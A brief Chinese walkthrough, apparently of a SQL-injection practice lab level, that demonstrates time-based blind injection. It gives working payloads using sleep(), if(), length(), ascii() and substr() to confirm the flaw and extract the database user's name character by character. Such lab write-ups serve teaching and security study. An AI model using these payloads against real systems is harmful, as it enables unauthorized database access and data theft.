1.注入单引号

 

2.继续注入常用测试条件

 

 

 

 

 经过多次测试就可以发现，无论注入什么，页面的显示都一样，看不到任何有效的反馈

3.根据本关的标题，尝试时间盲注

构造如下Payload：

?id=1' and sleep(3)%23

 

 页面延迟了3秒说明注入成功

4.利用时间盲注，爆破用户名

查询用户名长度

?id=1' and if(length(user())=0,sleep(3),NULL)%23

猜测用户名长度，直到页面出现3秒延迟

 

 爆破用户名

通过逐个字符比对用户名的ASCII码，爆破用户名

?id=1' and if(ascii(substr(user(),1,1))=num,sleep(3),NULL)%23

猜测ascii码值，直到页面出现3秒延迟

得到第一个字符的ASCII码为114，同样的方法获取剩下13个字符的ASCII码。